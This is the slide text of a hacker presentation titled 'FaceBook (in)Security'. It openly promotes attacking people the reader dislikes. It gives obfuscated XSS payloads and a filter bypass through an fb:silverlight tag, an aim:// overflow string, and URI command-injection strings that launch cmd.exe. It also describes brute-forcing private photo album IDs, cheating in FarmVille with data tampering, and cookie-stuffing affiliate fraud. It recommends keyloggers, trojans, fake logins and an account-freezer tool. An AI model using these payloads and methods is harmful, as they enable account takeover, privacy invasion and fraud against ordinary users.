FaceBook (in)Security - Majalah Info Komputer Online

					FaceBook (in)Security
      Anselmus Ricky
                          Introduction




                Hi, my name is Anselmus Ricky, and I am an asshole.

I hack stuffs for my own benefits, manipulating girls feelings like it means nothing, get
   excessively drunk at inappropriate times, ignore consequences to my actions, mock
        those idiots and posers, and just generally enjoy exploiting other people’s
                                psychological insecurities.

But, I do contribute to humanity in one very important way; I share my knowledge and
                                    stories to the world.
     FaceBook (in)Security – an Overview


•   Attacking via Functionality
•   Attacking via Offsite Contents
•   Attacking with IMG Tag / Scripts
•   Attacking with Simple URL Forgery
•   Attacking the Applications
•   Attacking via Applications
•   Social Engineering and Information Usages*
Attacking FaceBook Functionality




        Email Hacking
Attacking FaceBook Functionality




      “Won’t it be hard?”
Attacking FaceBook Functionality
“No! You still have no information regarding to her postal
            code! How can you hack her then?”
  Attacking FaceBook Functionality




Suggestion: “just don’t do it over Mr.
   Susilo Bambang Yudhoyono.”
  Attacking FaceBook via Offsite Contents


• If you want to spy one someone:
   – Use keyloggers and/or trojans (please don’t refer to condom)
• If you hate someone:
   – Feel free to take over their account using fake login
• If you hate a lot of ‘someone’:
   – Stimulate your fake login with Cross Site Scripting
• If you do not know how to hack FaceBook:
   – Feel free to ‘curse’ the person you hate
   – Feel free to cast bad comments on his/her walls
   – Feel free to use Account Freezer Software
       http://www.indowebster.com/Facebook_Account_Freezer_v1.html
                      Multi-line Strings

 On PHP we know multi-line string creation tool called heredoc –
            which can help programmer to simplify:

$my_string = "Tizag - Unlock your potential!";
echo "Tizag - Unlock your potential!";
echo $my_string;

                         Which displayed as:

Tizag - Unlock your potential! Tizag - Unlock your potential!
               Multi-line Strings
                         Into something like:

$my_string = <<<TEST
Tizag.com
Webmaster Tutorials
Unlock your potential!
TEST;

echo $my_string;

                     Which still displayed as:

Tizag.com Webmaster Tutorials Unlock your potential!
    Attacking FaceBook with Script Injections



•   XML is more complicated than JavaScript
•   XML support multi-line strings creation
•   XML are rarely used to commence attack
•   XML are not totally filtered by FaceBook
•   JS Parser on FireFox support E4X, but JS
    Sandbox technology doesn’t even know it
  Attacking FaceBook with Script Injections

          So instead of just executing this JavaScript:

<script>alert(‘Th0R Was Here!’);</script>

                             People just execute this:

<script>
<a b=” c” {alert(‘Th0R Was Here!’)}=”d” />
</script>

NB: where variables a, b, c, and d are just trash variables which used to conceal the alert string, you
    can change it into anything you like, but do not cross the script conditions (such as replacing
    characters, etc).
 Attacking FaceBook with Script Injections

                      And many more:

• "a"["__parent__"].eval("alert('any javascript here');");

• /a/["__parent__"].eval("alert('any javascript here');");

• 1.["__parent__"].eval("alert('any javascript here');");
                  URI – an Overview

• Generic URI
  – http://, ftp://, telnet:, etc.


• What other URI registered on the Net?
  – aim://, feed://, firefoxurl://, picasa://, etc.
    Attacking FaceBook with URI Abuse



• URI often linked directly to applications

• Applications are vulnerable

• Means – XSS (Cross Site Scripting) is up!
 Attacking FaceBook with URI Abuse

• The aim:// is actually calling the
  command:

  ‘Rundll32.exe “C:\Program
  Files\Trillian\plugins\aim.dll”,
  aim_util_urlHandler url=“%1”
  ini=“c:\program
  files\trillian\users\default\cache\pending_ai
  m.ini”’.
 Attacking FaceBook with URI Abuse


• Means attack can modify the value of
  aim_util_urlHandler through the URI itself.
  Example – aim://OwnURL.

• Copied without being checked (nor
  filtered) leading the application to go under
  Stack Overflow.
  Attacking FaceBook with URI Abuse
Example:
• Aim:///#1111111/
  111111111111111111111111111111111111111111111111111111111111
  111111111111111111112222222222222222222222222222222222222222
  222222222222222222222222222222222222222222222222222222222222
  333333333333333333333333333333333333333333333333333333333333
  333333333333333333333333333333333333333344444444444444444444
  444444444444444444444444444444444444444444444444444444444444
  444444444444444444445555555555555555555555555555555555555555
  555555555555555555555555555555555555555555555555555555555555
  666666666666666666666666666666666666666666666666666666666666
  666666666666666666666666666666666666666677777777777777777777
  777777777777777777777777777777777777777777777777777777777777
  777777777777777777778888888888888888888888888888888888888888
  888888888888888888888888888888888888888888888888888888888888
  999999999999999999999999999999999999999999999999999999999999
  999999999999999999999999999999999999999900000000000000000000
  000000000000000000000000000000000000000000000000000000000000
  00000000000000000000
Attacking FaceBook with URI Abuse
  Attacking FaceBook with URI Abuse

• What to do if you wanted to contact Mr. Joan Joman as a girl?

   – ymsgr:sendim?joker_salapant&m=I+think+we+should+go+for+
     a+date…+meet+you+there
   – gtalk:chat?jid=joker_salapant@gmail.com
   – gtalk:call?jid=joker_salapant@gmail.com
   – aim:goim?screenname=joker_salapant&m=I+love+you+NOT
   – skype:joan_salapant?call
  Attacking FaceBook with URI Abuse


• Prank! True, it can gain quite some excitement.

• What if you create an XSS which will do the loop to send as
  many messages as possible to a single YM account? And put
  it on your website which been visited by 600 people on daily
  basis?

• Cross-providers DDoS people!
  Attacking FaceBook with URI Abuse

There are also simpler URI which can cause a command injection:
• mailto:%00%00../../../../../../windows/system32/cmd”.exe
  ../../../../../../../../windows/system32/calc.exe “-” blah.bat
• nntp:%00%00../../../../../../windows/system32/cmd”.exe
  ../../../../../../../../windows/system32/calc.exe “-” blah.bat
• news:%00%00../../../../../../windows/system32/cmd”.exe
  ../../../../../../../../windows/system32/calc.exe “-” blah.bat
• snews:%00%00../../../../../../windows/system32/cmd”.exe
  ../../../../../../../../windows/system32/calc.exe “-” blah.bat
• telnet:%00%00../../../../../../windows/system32/cmd”.exe
  ../../../../../../../../windows/system32/calc.exe “-” blah.bat
• Etc.
   Attacking FaceBook with URI Abuse

     Several unique and new URI can be used to bypass JS
                      filtering on FaceBook:

              <fb:silverlight silverlightsrc="http://www.somesite.com/silverlight" />

                                              Forged into:


             <fb:silverlight silverlightsrc=”a” mce_src=”a” width=”\”
                    height=”,<script>alert(‘Th0R’)</script>);//” />


NB: Microsoft Silverlight is a web application framework that provides functionalities similar to those
    in Adobe Flash, integrating multimedia, graphics, animations and interactivity into a single runtime
    environment.

                 http://wiki.developers.facebook.com/index.php/Fb:silverlight
Attacking FaceBook with URL Forgery




     URL Forgery – anyone?
Attacking FaceBook with URL Forgery
    Attacking FaceBook with URL Forgery

     The new way – the bruteforce attack – the working ones:

• This is the URL of your friend’s album:
   – http://facebook.com/album.php?aid=161512&id=987654321
• Where variable id= means their profiles unique numbers
   – id=987654321
• Which can easily be seek through friends search
   – you can either search, right-click and view properties, etc.
• On the other hand variable aid= means their album unique numbers
   – aid=161512
• Which impossible to search – therefore, we bruteforce attack it.
  – http://www.owasp.org/index.php/Category:OWASP_Webslayer_
    Project
Attacking FaceBook with URL Forgery
Attacking FaceBook with URL Forgery
Attacking FaceBook with URL Forgery
           Attacking FaceBook Applications

    I hate Zynga. They’ve been on the business for only (less than) 2
          years, and now having the numerous growth in financial
      records and total company’s revenues – they’ve earned US$100
             millions profits for the year of 2009 and counting.

•    They implement Mafia Wars, FarmVille, and Café World.
•    All of them are world-widely known and become so popular.
•    FarmVille itself got 60 millions people playing it on daily basis.
•    Mafia Wars follow right on the 2nd place.
•    Café World is on its way to the top with tremendous growth.
•    Zynga is the best financial contributors to FaceBook.
Attacking FaceBook Applications




 So I want to hack FarmVille!
        Attacking FaceBook Applications

The easiest way is to play around with the ‘stuck-character’.

• I just simply go to the market and buy some cheap decorations.
        Attacking FaceBook Applications

• Put my farmer character on the corner of my farm and lock him up
  with the decorations I bought.
         Attacking FaceBook Applications

• I start doing my farming life without any time wasted to wait for my
  character to move land-by-land to plow, watering and do a lot of
  other stuffs.
      Attacking FaceBook Applications

But I want in-game money! Then I will just play around the their
                        “flash-timer”.
       Attacking FaceBook Applications

• Approving what my neighbors asked me to do
        Attacking FaceBook Applications

• However, I didn’t move my mouse cursor from that point. Keep on
  clicking to visit the same neighbor over and over again.
         Attacking FaceBook Applications

• After 20 times doing that clicking stuffs. I just click approve to all the
  offers given (there will be 20 in totals). Which means I’ve got 20x
  bigger money and 20x more experiences compared to normal.
      Attacking FaceBook Applications

The harder way is to tamper the data on each games. Since I’m
   bored with Zynga – I will do it with other game developers.
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
   Attacking FaceBook Applications




Do not forget to download Data Tamper via this link:
    https://addons.mozilla.org/en-US/firefox/addon/966
       Attacking via FaceBook Applications

     When you’re running out of ideas to hack FaceBook main
     applications, then just use their side applications to hack the
                            person you hate.



•   Create your own group for Social Engineering methods
•   Create your own application with malicious contents inside
•   Create or find a loophole on other’s applications (usually games)
•   Check Friends for Sale (FFS) application
Attacking via FaceBook Applications
Attacking via FaceBook Applications
     Attacking via FaceBook Applications


• What if I change the HTML code from:
   – <img
     src=‘http://i877.photobucket.com/albums/ab333/steffi1306/spongebob.jpg’></img
     >


• Into something like:
   – <img src=‘http://www.th0r.info/images/amazon.jpg’></img>


• Where amazon.jpg is a redirection to:
   – http://www.amazon.com/?Fencoding=UTF8&tag=qufrho-20
Attacking via FaceBook Applications
     Attacking via FaceBook Applications

                         Meaning . . .
• People who open that page will see my picture
• The picture will be shown as broken picture
• While I actually redirected them all to amazon.com
• Within the amazon.com link I engraved my personal affiliate ID
• People will got their browsers cookies stuffed
• Whoever go to amazon.com and buy something, will have their
  purchase commissions come into my very own wallet
• What do you think of cookie stuffing (for fun and profit) which
  resides on FaceBook – the social networking website with 400
  million users accessing it every single day
               Thank You

                 Anselmus Ricky
                http://www.th0r.info
Mobile: (+62) 813-8017-5867 and (+1) 206-458-5992
         MSN: binus_2_0_0_4@hotmail.com
           YM: hackingforte (@yahoo.it)
             BlackBerry PIN: 209256E2

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:3
posted:1/31/2013
language:Unknown
pages:60
Description: FaceBook (in)Security - Majalah Info Komputer Online